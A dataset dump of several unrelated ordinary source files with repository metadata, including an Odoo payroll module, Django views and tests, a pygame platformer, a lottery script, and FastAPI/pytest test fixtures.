seq_id stringlengths 4 11 | text stringlengths 113 2.92M | repo_name stringlengths 4 125 ⌀ | sub_path stringlengths 3 214 | file_name stringlengths 3 160 | file_ext stringclasses 18
values | file_size_in_byte int64 113 2.92M | program_lang stringclasses 1
value | lang stringclasses 93
values | doc_type stringclasses 1
value | stars int64 0 179k ⌀ | dataset stringclasses 3
values | pt stringclasses 78
values |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
74918582185 | # -*- coding: utf-8 -*-
import datetime
from dateutil import rrule
from odoo import models, fields, api, _
from odoo.exceptions import UserError
class Loan(models.Model):
_name = "hr.loan"
_description = 'Employee Loans'
@api.model
def _default_currency(self):
return self.env.user.company_id.currency_id.id
employee_id = fields.Many2one('hr.employee', string="Employee", readonly=True,
states={'draft': [('readonly', False)]})
date_from = fields.Date('From Date', readonly=True, states={'draft': [('readonly', False)]})
date_to = fields.Date('To Date', readonly=True, states={'draft': [('readonly', False)]})
currency_id = fields.Many2one('res.currency', default=_default_currency, string="Currency", readonly=True,
states={'draft': [('readonly', False)]})
amount_total = fields.Monetary(string="Total Loan Amount", readonly=True, states={'draft': [('readonly', False)]})
amount_deduct = fields.Monetary(string="Deduction Amount", readonly=True, states={'draft': [('readonly', False)]})
type = fields.Selection([('sss', 'SSS'), ('hdmf', 'HDMF'), ('other', 'OTHER')], string='Type', readonly=True,
states={'draft': [('readonly', False)]})
amount_total_deducted = fields.Monetary(string="Total Deducted Amount", readonly=True,
states={'draft': [('readonly', False)]})
state = fields.Selection([('draft', 'Draft'), ('open', 'In Progress'), ('done', 'Done')], string="Status",
default="draft", store=True)
@api.one
def _compute_state(self):
if self.amount_total_deducted >= self.amount_total:
self.state = 'done'
@api.multi
def action_open(self):
self.write({'state': 'open'})
@api.multi
def unlink(self):
for loan in self:
if loan.state in ['open', 'done']:
raise UserError(_('Deleting of open or paid loans is not allowed.'))
return super(Loan, self).unlink()
@api.multi
def name_get(self):
result = []
for loan in self:
amount_str = 0.0
if loan.currency_id.position == 'before':
amount_str = loan.currency_id.symbol + ' ' + str(loan.amount_total)
if loan.currency_id.position == 'after':
amount_str = str(loan.amount_total) + ' ' + loan.currency_id.symbol
result.append((loan.id, "[%s] %s" % (amount_str, loan.employee_id.name)))
return result
class TripTemplate(models.Model):
_name = "ibas_hris.trip_template"
_description = 'TRIP TEMPLATE'
@api.model
def _default_currency(self):
return self.env.user.company_id.currency_id.id
name = fields.Char('Name', compute="_compute_name", store=True)
loc_from = fields.Char('From Location', required=True)
loc_to = fields.Char('To Location', required=True)
currency_id = fields.Many2one('res.currency', default=_default_currency, string="Currency")
amount = fields.Monetary(string="Amount", required=True)
@api.depends('loc_from', 'loc_to')
def _compute_name(self):
self.name = (self.loc_from or '') + ' -> ' + (self.loc_to or '')
class Trip(models.Model):
_name = "ibas_hris.trip"
_description = 'TRIPS'
@api.model
def _default_currency(self):
return self.env.user.company_id.currency_id.id
date = fields.Date('Date', required=True)
trip_template_id = fields.Many2one('ibas_hris.trip_template', string='Template')
loc_from = fields.Char('From Location', required=True)
loc_to = fields.Char('To Location', required=True)
currency_id = fields.Many2one('res.currency', default=_default_currency, string="Currency")
amount = fields.Monetary(string="Amount", required=True)
employee_id = fields.Many2one('hr.employee', string="Employee", required=True)
@api.multi
def name_get(self):
result = []
for trip in self:
result.append((trip.id, "[%s] %s" % (trip.employee_id.name, (trip.loc_from or '') + ' -> ' + (trip.loc_to or ''))))
return result
@api.onchange('trip_template_id')
def _onchange_trip_template_id(self):
if self.trip_template_id:
self.loc_from = self.trip_template_id.loc_from
self.loc_to = self.trip_template_id.loc_to
self.amount = self.trip_template_id.amount
class Employee(models.Model):
_inherit = 'hr.employee'
loan_ids = fields.One2many('hr.loan', 'employee_id', string='Loans')
trip_ids = fields.One2many('ibas_hris.trip', 'employee_id', string='Trips')
@api.model
def _current_year_avg_net_pay(self, current_payslip=None):
date_from = datetime.date.today().strftime('%Y-01-01')
date_to = datetime.date.today().strftime('%Y-12-31')
payslips = self.env['hr.payslip'].search(
[('employee_id', '=', self.id), ('date_from', '>=', date_from), ('date_from', '<=', date_to),
('id', '!=', current_payslip.id)])
lines = payslips.mapped('line_ids').filtered(lambda r: r.code == 'NETPAY')
return sum(lines.mapped('total'))
class Payslip(models.Model):
_inherit = 'hr.payslip'
deduct_sss = fields.Boolean('Deduct SSS')
deduct_philhealth = fields.Boolean('Deduct Philhealth')
deduct_hdmf = fields.Boolean('Deduct HDMF')
generate_backpay = fields.Boolean('Generate 13 th Month Pay / BackPay')
@api.model
def get_worked_day_lines(self, contracts, date_from, date_to):
res = super(Payslip, self).get_worked_day_lines(contracts, date_from, date_to)
att_obj = self.env['hr.attendance']
contract = self.contract_id
employee = self.employee_id
resource_calendar_id = employee.work_sched or contract.resource_calendar_id
attendances = att_obj.search(
[('employee_id', '=', contract.employee_id.id), ('check_in', '>=', date_from), ('check_in', '<=', date_to)])
# HR-2, 3, 5, 6, 7, 8, 9, 10
late_in_float = 0.0
undertime_minutes = 0.0
regular_holiday_worked_hours = 0.0
special_holiday_worked_hours = 0.0
restday_regular_holiday_worked_hours = 0.0
restday_special_holiday_worked_hours = 0.0
actual_worked_hours = 0.0
restday_hours = 0.0
for att in attendances:
if att.is_workday:
if att.is_tardy:
late_in_float += att.late_in_float
if att.is_undertime:
undertime_minutes += att.undertime_minutes
if att.is_regular:
regular_holiday_worked_hours += att.worked_hours < 8 and att.worked_hours or 8
if att.is_special:
special_holiday_worked_hours += att.worked_hours < 8 and att.worked_hours or 8
if not att.is_workday:
if att.is_regular:
restday_regular_holiday_worked_hours += att.worked_hours < 8 and att.worked_hours or 8
if att.is_special:
restday_special_holiday_worked_hours += att.worked_hours < 8 and att.worked_hours or 8
restday_hours += att.worked_hours < 8 and att.worked_hours or 8
actual_worked_hours += att.worked_hours < 8 and att.worked_hours or 8
# HR-4
absences = 0
for day in rrule.rrule(rrule.DAILY, dtstart=fields.Datetime.from_string(date_from),
until=fields.Datetime.from_string(date_to).replace(hour=23, minute=59, second=59,
microsecond=999999)):
if not attendances.filtered(lambda r: str(day) <= r.check_in <= str(
day.replace(hour=23, minute=59, second=59, microsecond=999999)) and r.is_workday):
work_hours = employee.get_day_work_hours_count(day, calendar=resource_calendar_id)
if work_hours:
holiday = self.env['ibas_hris.holiday'].search([('date', '=', day.date())])
if not holiday:
absences += 1
# HR-5
overtimes = self.env['ibas_hris.ot'].search(
[('state', '=', 'approved'), ('overtime_from', '>=', date_from + ' 00:00:00'),
('overtime_from', '<=', date_to + ' 23:59:59'), ('employee_id', '=', employee.id)])
regular_ot_minutes = 0.0
restday_ot_minutes = 0.0
regular_holiday_ot_minutes = 0.0
special_holiday_ot_minutes = 0.0
regular_holiday_restday_ot_minutes = 0.0
special_holiday_restday_ot_minutes = 0.0
for ot in overtimes:
ot_day = fields.Datetime.from_string(date_from).date()
ot_day_work_hours = employee.get_day_work_hours_count(ot_day, calendar=resource_calendar_id)
ot_day_holiday = self.env['ibas_hris.holiday'].search([('date', '=', ot_day)])
if ot_day_work_hours and not ot_day_holiday: # Regular Overtime
regular_ot_minutes = + ot.ot_minutes
elif not ot_day_work_hours and not ot_day_holiday: # Restday Overtime
restday_ot_minutes = + ot.ot_minutes
if ot_day_work_hours and ot_day_holiday and ot_day_holiday.holiday_type == 'regular': # Regular Holiday Overtime
regular_holiday_ot_minutes = + ot.ot_minutes
if ot_day_work_hours and ot_day_holiday and ot_day_holiday.holiday_type == 'special': # Special Holiday Overtime
special_holiday_ot_minutes = + ot.ot_minutes
if not ot_day_work_hours and ot_day_holiday and ot_day_holiday.holiday_type == 'regular': # Regular Holiday Restday Overtime
regular_holiday_restday_ot_minutes = + ot.ot_minutes
if not ot_day_work_hours and ot_day_holiday and ot_day_holiday.holiday_type == 'special': # Special Holiday Restday Overtime
special_holiday_restday_ot_minutes = + ot.ot_minutes
res.extend([
{
'name': _("Lates"), # HR-2
'sequence': 1,
'code': 'LATE',
'number_of_days': (late_in_float / 60.00) / 8.00,
'number_of_hours': (late_in_float / 60.00),
'contract_id': contract.id,
}, {
'name': _("UNDERTIME"), # HR-3
'sequence': 2,
'code': 'UNDERTIME',
'number_of_days': (undertime_minutes / 60.00) / 8.00,
'number_of_hours': (undertime_minutes / 60.00),
'contract_id': contract.id,
}, {
'name': _("ABSENT"), # HR-4
'sequence': 3,
'code': 'ABSENT',
'number_of_days': absences,
'number_of_hours': absences * 8.00,
'contract_id': contract.id,
}, {
'name': _("Overtime"), # HR-5 (a)
'sequence': 4,
'code': 'OT',
'number_of_days': (regular_ot_minutes / 60) / 8,
'number_of_hours': regular_ot_minutes / 60,
'contract_id': contract.id,
}, {
'name': _("Restday Overtime"), # HR-5 (b)
'sequence': 4,
'code': 'RDOT',
'number_of_days': (restday_ot_minutes / 60) / 8,
'number_of_hours': restday_ot_minutes / 60,
'contract_id': contract.id,
}, {
'name': _("Regular Holiday Overtime"), # HR-5 (c)
'sequence': 4,
'code': 'RHOT',
'number_of_days': (regular_holiday_ot_minutes / 60) / 8,
'number_of_hours': regular_holiday_ot_minutes / 60,
'contract_id': contract.id,
}, {
'name': _("Special Holiday Overtime"), # HR-5 (d)
'sequence': 4,
'code': 'SHOT',
'number_of_days': (special_holiday_ot_minutes / 60) / 8,
'number_of_hours': special_holiday_ot_minutes / 60,
'contract_id': contract.id,
}, {
'name': _("Restday Regular Holiday Overtime"), # HR-5 (e)
'sequence': 4,
'code': 'RDRHOT',
'number_of_days': (regular_holiday_restday_ot_minutes / 60) / 8,
'number_of_hours': regular_holiday_restday_ot_minutes / 60,
'contract_id': contract.id,
}, {
'name': _("Restday Special Holiday Overtime"), # HR-5 (f)
'sequence': 4,
'code': 'RDSHOT',
'number_of_days': (special_holiday_restday_ot_minutes / 60) / 8,
'number_of_hours': special_holiday_restday_ot_minutes / 60,
'contract_id': contract.id,
}, {
'name': _("Regular Holiday"), # HR-6
'sequence': 5,
'code': 'RH',
'number_of_days': regular_holiday_worked_hours / 8,
'number_of_hours': regular_holiday_worked_hours,
'contract_id': contract.id,
}, {
'name': _("Special Holiday"), # HR-7
'sequence': 6,
'code': 'SH',
'number_of_days': special_holiday_worked_hours / 8,
'number_of_hours': special_holiday_worked_hours,
'contract_id': contract.id,
}, {
'name': _("Restday Regular Holiday"), # HR-8
'sequence': 7,
'code': 'RDRH',
'number_of_days': restday_regular_holiday_worked_hours / 8,
'number_of_hours': restday_regular_holiday_worked_hours,
'contract_id': contract.id,
}, {
'name': _("Actual Days Worked"), # HR-9
'sequence': 8,
'code': 'NORMWD',
'number_of_days': actual_worked_hours / 8,
'number_of_hours': actual_worked_hours,
'contract_id': contract.id,
}, {
'name': _("Restday Special Holiday"), # HR-10
'sequence': 9,
'code': 'RDSH',
'number_of_days': restday_special_holiday_worked_hours / 8,
'number_of_hours': restday_special_holiday_worked_hours,
'contract_id': contract.id,
}, {
'name': _("Restday"), # HR-10
'sequence': 10,
'code': 'RD',
'number_of_days': restday_hours / 8,
'number_of_hours': restday_hours,
'contract_id': contract.id,
}
])
return res
@api.multi
def action_payslip_done(self):
res = super(Payslip, self).action_payslip_done()
for rec in self:
for l in rec.line_ids:
if l.code == 'SSSLOAN':
loan = rec.employee_id.loan_ids.filtered(lambda r: r.state == 'open' and r.type == 'sss')
loan and loan[0].write({'amount_total_deducted': loan.amount_total_deducted + l.total})
loan and loan._compute_state()
if l.code == 'HDMFLOAN':
loan = rec.employee_id.loan_ids.filtered(lambda r: r.state == 'open' and r.type == 'hdmf')
loan and loan[0].write({'amount_total_deducted': loan.amount_total_deducted + l.total})
loan and loan._compute_state()
if l.code == 'OTHLOAN':
loan = rec.employee_id.loan_ids.filtered(lambda r: r.state == 'open' and r.type == 'other')
loan and loan[0].write({'amount_total_deducted': loan.amount_total_deducted + l.total})
loan and loan._compute_state()
return res
| lawrence24/ndms-1 | ibas_payroll/models/models.py | models.py | py | 15,973 | python | en | code | 0 | github-code | 36 |
75188620264 | import unittest
import numpy as np
from numpy.linalg import norm
import hmcollab.models
from hmcollab import directories
from hmcollab import articles
from hmcollab.tests.fake_data import articles_random_df
# The suite test the following:
# + articles dataset and preprocessing such as:
# shape and one-hot encoding implementation
# Those tests can be replaced with unittest using
# One-hot and indices can be tested with a simple synthetic dataset
# consisting of a couple of categorical columns and a numerical index
# column with some IDS starting with 0
# + Other are integration test testing results from KNN
# We might want to remove those and only keep integration test are models
class TestArticles(unittest.TestCase):
def setUp(self):
self.simple_onehot = np.load(directories.testdata("simple_onehot.npy"))
self.articles = articles_random_df(17)
def tearDown(self):
pass
def get_simple(self):
return articles.ArticleFeatureMungerSpecificFeatures(
self.articles,
[
"color",
"article",
],
)
def get_simple_knn(self):
return hmcollab.models.ArticleKNN(self.get_simple().x, 4)
def test_article_simple_feature_array(self):
a = self.get_simple()
expected = (17, 5)
actual = a.x.shape
self.assertEqual(expected, actual)
# number of rows in original dataframe should be same as in matrix representation
expected, _ = a.df.shape
actual, _ = a.x.shape
self.assertEqual(expected, actual)
# test that actual onehot values are the same as a previously saved example
expected = self.simple_onehot
actual = a.x.values
self.assertEqual(0, norm(actual - expected))
def test_id_from_index(self):
a = self.get_simple()
expected = "02"
actual = a.id_from_index(2)
self.assertEqual(expected, actual)
def knn_test(self, d, indices):
# check that actual distances match expected
expected = np.array([0.0, 0.0, 0.0, 0])
actual = np.array(d[0])
self.assertAlmostEqual(0, norm(actual - expected))
# check that actual indices match expected
expected = {3, 4, 6, 10}
actual = set(indices[0])
self.assertEqual(expected, actual)
def test_knn_by_row(self):
knn = self.get_simple_knn()
x = self.simple_onehot
# choose row 10, for which there are two other exact matches
row = x[10]
d, indices = knn.nearest(row=row)
self.knn_test(d, indices)
def test_knn_by_index(self):
a = self.get_simple()
knn = self.get_simple_knn()
x = self.simple_onehot
# choose row 10, for which there are two other exact matches
row = a.x.values[10]
d, indices = knn.nearest(row)
self.knn_test(d, indices)
| newexo/HM-clothing-public | hmcollab/tests/test_articles.py | test_articles.py | py | 2,941 | python | en | code | 0 | github-code | 36 |
37229157121 | import pygame
from player import *
from blocks import *
from pyganim import *
# window
WIN_WIDTH = 800 # Ширина создаваемого окна
WIN_HEIGHT = 640 # Высота
DISPLAY = (WIN_WIDTH, WIN_HEIGHT) # Группируем ширину и высоту в одну переменную
BACKGROUND_COLOR = (0, 64, 0)
NAME = "Battle of one"
ANIMATION_DELAY = 0.1 # скорость смены кадров
def main():
pygame.init() # Инициация PyGame, обязательная строчка
screen = pygame.display.set_mode(DISPLAY) # Создаем окошко
pygame.display.set_caption(NAME) # Пишем в шапку
surf = pygame.Surface(DISPLAY)
surf.fill(BACKGROUND_COLOR)
hero = Player(55, 55) # создаем героя по (x,y) координатам
left = right = False # по умолчанию — стоим
up = False
entities = pygame.sprite.Group() # Все объекты
platforms = [] # то, во что мы будем врезаться или опираться
entities.add(hero)
level = ["_________________________",
"_ _",
"_ _",
"_ _",
"_ _",
"_ _",
"_ _",
"_ _____",
"_ _",
"_ _",
"_ _ _",
"_ ____ _",
"_ _",
"_ _ _",
"_ __ _",
"_ _",
"_ _________ _",
"_ _",
"_ _",
"_________________________"]
timer = pygame.time.Clock()
x = y = 0 # координаты
for row in level:
for col in row:
if col == "_":
platform = Platform(x, y)
entities.add(platform)
platforms.append(platform)
x = x + PLATFORM_WIDTH # блоки платформы ставятся на ширине блоков
y = y + PLATFORM_HEIGHT # то же самое и с высотой
x = 0 # на каждой новой строчке начинаем с нуля
while 1: # Основной цикл программы
timer.tick(60) #fps = 60
for e in pygame.event.get():
keys = pygame.key.get_pressed()
if e.type == KEYDOWN and e.key == K_UP:
up = True
if e.type == KEYUP and e.key == K_UP:
up = False
if e.type == KEYDOWN and e.key == K_LEFT:
left = True
if e.type == KEYDOWN and e.key == K_RIGHT:
right = True
if e.type == KEYUP and e.key == K_RIGHT:
right = False
if e.type == KEYUP and e.key == K_LEFT:
left = False
if e.type == pygame.QUIT:
exit()
screen.blit(surf, (0, 0)) # перерисовка на каждой итерации
hero.update(left, right, up, platforms) # передвижение
entities.draw(screen) # отображение всего
pygame.display.update() # обновление и вывод всех изменений на экран
if __name__ == "__main__":
main()
| Cruciano/Totsuka-Blade | game.py | game.py | py | 3,608 | python | ru | code | 0 | github-code | 36 |
42883305614 |
class Solution:
def twoSum(self, nums, target: int):
for p1, n1 in enumerate(nums):
# Maybe look directly the difference is in the list or something like that could be faster, not sure
for p2 in range(p1+1, len(nums)):
if (n1 + nums[p2]) == target:
return [p1, p2]
if __name__=="__main__":
a = Solution()
print(a.twoSum([3,3], 6)) | pablorenato1/leetcode-problems | Easy/Two-Sum.py | Two-Sum.py | py | 412 | python | en | code | 0 | github-code | 36 |
24527321437 | import shutil
import tempfile
from ..models import Post, User, Comment
from django.conf import settings
from django.test import Client, TestCase, override_settings
from django.urls import reverse
from django.core.files.uploadedfile import SimpleUploadedFile
TEMP_MEDIA_ROOT = tempfile.mkdtemp(dir=settings.BASE_DIR)
@override_settings(MEDIA_ROOT=TEMP_MEDIA_ROOT)
class TestPostForm(TestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.post_text = 'Test Text PostForm'
cls.user_name = 'PostForm'
cls.user = User.objects.create_user(username=cls.user_name)
cls.first_post = Post.objects.create(
text=cls.post_text,
author=cls.user,
)
def setUp(self):
self.guest_client = Client()
self.authorized_client = Client()
self.authorized_client.force_login(self.user)
@classmethod
def tearDownClass(cls):
super().tearDownClass()
shutil.rmtree(TEMP_MEDIA_ROOT, ignore_errors=True)
def test_create_post(self):
"""Проверка формы создания поста"""
small_gif = (
b'\x47\x49\x46\x38\x39\x61\x02\x00'
b'\x01\x00\x80\x00\x00\x00\x00\x00'
b'\xFF\xFF\xFF\x21\xF9\x04\x00\x00'
b'\x00\x00\x00\x2C\x00\x00\x00\x00'
b'\x02\x00\x01\x00\x00\x02\x02\x0C'
b'\x0A\x00\x3B'
)
uploaded = SimpleUploadedFile(
name='small.gif',
content=small_gif,
content_type='image/gif'
)
posts_count = Post.objects.count()
Comment.objects.create(
post=self.first_post,
author=self.user,
text='test text com'
)
form_post = {
'text': 'TEXT',
'author': self.user,
'image': uploaded,
}
response = self.authorized_client.post(
reverse('posts:post_create'),
data=form_post,
follow=True
)
self.assertRedirects(response, reverse('posts:profile', kwargs={
'username': self.user_name
}))
self.assertEqual(Post.objects.count(), posts_count + 1)
self.assertTrue(
Post.objects.filter(text='TEXT', image='posts/small.gif').exists()
)
self.assertTrue(
Comment.objects.filter(text='test text com').exists()
)
def test_edit_post(self):
"""Проверка формы редактирования поста"""
form_data = {
'text': 'test_text',
'author': self.user
}
response = self.authorized_client.post(
reverse(
'posts:post_edit',
kwargs={'post_id': '1'}),
data=form_data,
follow=True
)
self.assertRedirects(
response,
reverse(
'posts:post_detail',
kwargs={'post_id': '1'}
))
self.assertTrue(Post.objects.filter(text='test_text'))
| Gabrie1002/hw05_final | yatube/posts/tests/test_forms.py | test_forms.py | py | 3,092 | python | en | code | 1 | github-code | 36 |
32920662032 | # -*- coding: utf-8 -*-
import copy
from typing import List
from flowlauncher import FlowLauncher
from plugin.templates import *
from plugin.devtoys import *
class Main(FlowLauncher):
messages_queue = []
def sendNormalMess(self, title: str, subtitle: str):
message = copy.deepcopy(RESULT_TEMPLATE)
message["Title"] = title
message["SubTitle"] = subtitle
self.messages_queue.append(message)
def sendActionMess(self, title: str, subtitle: str, icopath: str, method: str, value: List):
# information
message = copy.deepcopy(RESULT_TEMPLATE)
message["Title"] = title
message["SubTitle"] = subtitle
if icopath != "":
message["IcoPath"] = icopath
# action
action = copy.deepcopy(ACTION_TEMPLATE)
action["JsonRPCAction"]["method"] = method
action["JsonRPCAction"]["parameters"] = value
message.update(action)
self.messages_queue.append(message)
def query(self, param: str) -> List[dict]:
q = param.strip().lower()
for tool in DEVTOYS_TOOLS:
key = tool["tool"]
name = tool["name"]
icon = tool["icon"] if "icon" in tool else ""
if q in key.lower() or q in name.lower():
self.sendActionMess(name, key, icon, "startDevtoysTool", [key])
return self.messages_queue
def startDevtoysTool(self, tool):
startTool(tool)
| umi-uyura/Flow.Launcher.Plugin.DevToysLauncher | plugin/ui.py | ui.py | py | 1,462 | python | en | code | 5 | github-code | 36 |
28212815026 | from django.shortcuts import get_object_or_404, render, redirect
from core.models import Item
from django.contrib.auth import login, logout, authenticate
from django.contrib.auth.models import User
import api.views as api
from core.forms import ItemCreateForm, UserCreateForm, UserLoginForm, UserUpdateForm
from django.contrib import messages
def index_view(request, q=None):
item_list = Item.objects.all()
if request.method == "POST":
q = request.POST.get("q")
messages.add_message(
request, messages.INFO, f"Showing search results containing: `{q}`"
)
item_list = Item.objects.filter(name__icontains=q)
context = {
"item_list": item_list,
}
return render(request, "index.html", context=context)
def user_register_view(request):
form = UserCreateForm(request.POST or None)
if request.method == "POST":
if form.is_valid():
user = form.save()
login(request, user)
messages.add_message(
request, messages.SUCCESS, "User was created successfully"
)
return redirect("core:index")
else:
messages.add_message(request, messages.ERROR, "Invalid Inputs.")
return redirect("core:user_register")
if request.user.is_authenticated:
return redirect("core:user_details", request.user.pk)
context = {"form": form, "type": "register"}
return render(request, "user/user_create_update.html", context=context)
def user_list_view(request):
user_list = User.objects.all()
context = {"user_list": user_list}
return render(request, "user/user_list.html", context=context)
def user_details_view(request, user_id: int):
user = get_object_or_404(User, pk=user_id)
context = {"user": user}
return render(request, "user/user_details.html", context=context)
def user_login_view(request):
if request.user.is_authenticated:
return redirect("core:user_details", request.user.pk)
form = UserLoginForm(request.POST or None)
if request.method == "POST":
if form.is_valid():
# username = form.cleaned_data["username"]
# password = form.cleaned_data["password"]
# user = authenticate(username=username, password=password)
user = authenticate(**form.cleaned_data)
if user is not None:
login(request, user)
messages.add_message(request, messages.SUCCESS, "You have logged in.")
return redirect("core:index")
else:
messages.add_message(request, messages.ERROR, "Invalid Credentials.")
context = {"form": form}
return render(request, "user/user_login.html", context=context)
def user_update_view(request):
if not request.user.is_authenticated:
messages.add_message(request, messages.ERROR, "You have to log in first.")
return redirect("core:user_login")
form = UserUpdateForm(request.POST or None)
if request.method == "POST":
user = get_object_or_404(User, pk=request.user.pk)
if form.is_valid():
new_data = {
"first_name": form.cleaned_data.get("first_name"),
"last_name": form.cleaned_data.get("last_name"),
"username": form.cleaned_data.get("username"),
"email": form.cleaned_data.get("email"),
}
password = form.cleaned_data.get("password")
for key, val in new_data.items():
if val:
print(f"{key}: {val} was eddited")
setattr(user, key, val)
if password:
user.set_password(password)
user.save()
logout(request)
login(request, user)
messages.add_message(
request, messages.SUCCESS, "Updated user data successfu<lly."
)
return redirect("core:user_details", request.user.pk)
else:
messages.add_message(request, messages.ERROR, "Invalid inputs!")
context = {"form": form, "type": "update"}
return render(request, "user/user_create_update.html", context=context)
def user_logout_view(request):
if request.method == "POST":
logout(request)
messages.add_message(request, messages.INFO, "You have been logged out.")
return redirect("core:index")
return render(request, "user/user_logout.html")
def item_create_view(request):
if not request.user.is_authenticated:
return redirect("core:user_login")
form = ItemCreateForm(request.POST, request.FILES or None)
if request.method == "POST":
print(request.FILES)
if form.is_valid():
print(form.cleaned_data)
item = Item(**form.cleaned_data)
item.user = request.user
item.save()
messages.add_message(request, messages.SUCCESS, "Item was Created.")
return redirect("core:index")
else:
messages.add_message(
request, messages.ERROR, "Invalid inputs for the Item."
)
context = {"form": form}
return render(request, "item/item_create.html", context=context)
def item_details_view(request, item_id: int):
item = get_object_or_404(Item, pk=item_id)
context = {"item": item}
return render(request, "item/item_details.html", context=context)
def item_delete_view(request, item_id: int):
if not request.user.is_authenticated:
messages.add_message(request, messages.ERROR, "You should login first.")
return redirect("core:user_login")
item = get_object_or_404(Item, pk=item_id)
if request.user != item.user:
messages.add_message(
request, messages.ERROR, "You can only delete items you own."
)
return redirect("core:index")
if request.method == "POST":
item.delete()
messages.add_message(
request, messages.SUCCESS, "Item was deleted successfully."
)
return redirect("core:index")
context = {"item": item}
return render(request, "item/item_delete.html", context=context)
def item_buy_view(request, item_id: int):
item = get_object_or_404(Item, pk=item_id)
if request.method == "POST":
res = api.pay_for_item(item.price)
if res.status_code != 200:
messages.add_message(request, messages.ERROR, "Something went wrong!")
return redirect("core:item_buy", {"item_id", item_id})
item.delete()
messages.add_message(request, messages.SUCCESS, "Item was bought successfully!")
return redirect("core:index")
return render(request, "item/item_buy.html", {"item": item})
def user_item_list_view(request, user_id: int):
item_list = Item.objects.all().filter(user__pk=user_id)
context = {
"item_list": item_list,
}
messages.add_message(
request, messages.INFO, f"Showing items owned by: {request.user.username}"
)
return render(request, "index.html", context=context)
| HomayoonAlimohammadi/divar | divar-clone/core/views.py | views.py | py | 7,084 | python | en | code | 0 | github-code | 36 |
2078168376 | from random import randint
jogo = []
listaJogadores = []
jogadores = []
jogadas = 1
acertos = []
quadraLista = []
quinaLista =[]
megaLista=[]
contador = 0
#gerando jogo aleatorio
for i in range(6):
jogo.append(randint(1, 60))
print('========== NÚMERO DA MEGASENA ==========')
print(jogo)
print('')
total = int(input("PREMIAÇÃO TOTAL: R$ "))
print('='*40)
while jogadas ==1:
#zerando jogadores
jogadores = []
#Gerando numero dos jogadores
count = 1
for i in range(6):
jogadores.append(int(input(f'{count}º Número: ')))
count+=1
print('')
#guardando numero dos jogadores em uma lista
listaJogadores.append(jogadores)
jogadas = int(input("1-Gerar Mais Jogadores 0-Encerrar: "))
#verificando numero do jogador dentro da lista (lista dentro de lista)
for jogador in listaJogadores:
jogadorAcertou = []
for elem in range(len(jogador)):
#passar em cada elemento da lista comparando
for x in range(len(jogo)):
if jogador[elem] == jogo[x]:
jogadorAcertou.append(elem)
#guardar so os elementos acertados
acertos.append(jogadorAcertou)
contador = 0
for lista in acertos:
if len(lista)==4:
quadraLista.append(listaJogadores[contador])
elif len(lista)==5:
quinaLista.append(listaJogadores[contador])
elif len(lista)==6:
megaLista.append(listaJogadores[contador])
contador = contador+1
print('')
if len(quadraLista) >= 1:
print('========== QUADRA ==========')
quadra = total*0.2
quadraPremio = quadra/len(quadraLista)
print(f'{len(quadraLista)} Ganhador(es)')
print(f'Número(s) ganhador(es): {quadraLista} ')
print(f"Prêmio: R$ {quadraPremio:.2f}")
print('')
if len(quinaLista) >= 1:
print('========== QUINA ==========')
quina = total*0.3
premioQuina = quina/len(quinaLista)
print(f'{len(quinaLista)} Ganhador(es)')
print(f'Número(s) ganhador(es): {quinaLista} ')
print(f"Prêmio: R$ {premioQuina:.2f}")
print('')
if len(megaLista) >= 1:
print('========== MEGA ==========')
mega = total*0.5
premioMega = mega/len(megaLista)
print(f'{len(megaLista)} Ganhador(es)')
print(f'Número(s) ganhador(es): {megaLista} ')
print(f'Prêmio: R$ {premioMega:.2f}')
print('') | LuanaFeliciano/Loteria | loteria.py | loteria.py | py | 2,259 | python | pt | code | 0 | github-code | 36 |
9475668450 | """API related fixtures."""
from contextlib import contextmanager
from typing import Any, Callable, ContextManager, Generator
from uuid import uuid4
import pytest
import respx
from fastapi.testclient import TestClient
from httpx import Request, Response
from python_scaffold import api, settings
@pytest.fixture(scope="session")
def test_client() -> TestClient:
"""Test client of the service.
[Read here for more](https://fastapi.tiangolo.com/tutorial/testing/)
"""
return TestClient(api.app)
@pytest.fixture()
def mock_api_auth() -> Callable[[Response | None], ContextManager[dict[str, respx.Route]]]:
"""Mock API for the auth API."""
@contextmanager
def _mock_api_auth(custom_response: Response | None = None) -> Generator[dict[str, respx.Route], None, None]:
def _dynamic_message_response(request: Request) -> Response:
if custom_response:
return custom_response
return Response(201, json={"access_token": uuid4().hex})
route_auth = respx.post(url=settings.external_api_auth_url, name="auth").mock(
side_effect=_dynamic_message_response
)
yield {"auth": route_auth}
return _mock_api_auth
@pytest.fixture()
def example_message() -> str:
"""Just a simple example message."""
return "Hi i am a example message."
@pytest.fixture()
async def mock_api_messages(example_message: str) -> Callable[..., ContextManager[dict[str, respx.Route]]]:
"""Mock an external API."""
@contextmanager
def _mock_api_messages(
messages: list[dict[str, Any]] | None = None
) -> Generator[dict[str, respx.Route], None, None]:
_default_messageid = "0" * 8
def _dynamic_message_response(request: Request) -> Response:
request_url_id = str(request.url).split("/")[-1]
if not request_url_id:
return Response(403, json={"details": "Error in request: no ID was given"})
message = example_message
if len(messages_ids_to_respond_custom_msg):
message = [
msg.get("base_message", example_message)
for msg in messages_ids_to_respond_custom_msg
if msg.get("messageid", _default_messageid) == request_url_id
][0]
if not len(message):
return Response(404, json={"details": "Error in request: no MSCONS with this ID exists."})
return Response(200, json=[{"edifact": message}])
messages_ids_to_respond_custom_msg = (
[message for message in messages if bool(message["compacted"])] if messages else []
)
route_messages = respx.get(
url=settings.external_api_base_url, path__startswith="/", name="get_some_messages"
).mock(side_effect=_dynamic_message_response)
yield {"messages": route_messages}
return _mock_api_messages
| IronicUsername/python-scaffold | python-scaffold/tests/test_python_scaffold/fixtures/api.py | api.py | py | 2,931 | python | en | code | 0 | github-code | 36 |
29701799964 | import os
import pandas as pd
import pandas.util.testing as pdt
import pytest
import six
@pytest.fixture
def sj_out_tab(tmpdir):
s = """chr1 76 299 1 2 1 0 1 39
chr1 201 299 1 1 1 0 1 10
chr1 201 249 1 1 0 0 1 22
chr1 201 799 1 1 1 19 20 43
chr1 201 799 1 1 0 8 15 41
chr1 155832 164262 1 1 1 61 3 46
chr1 156087 156200 1 1 0 1 14 44
chr1 329977 334128 1 1 1 0 2 14
chr1 569184 569583 1 1 0 0 1 17
chr1 655581 659737 1 1 1 0 2 14
chr1 661725 662046 1 1 0 0 1 22
chr1 668587 671992 1 1 0 0 4 28
"""
df = pd.read_table(six.StringIO(s), header=None, sep='\s+')
filename = '{0}/SJ.out.tab'.format(tmpdir)
df.to_csv(filename, index=False, header=False, sep='\t')
return filename
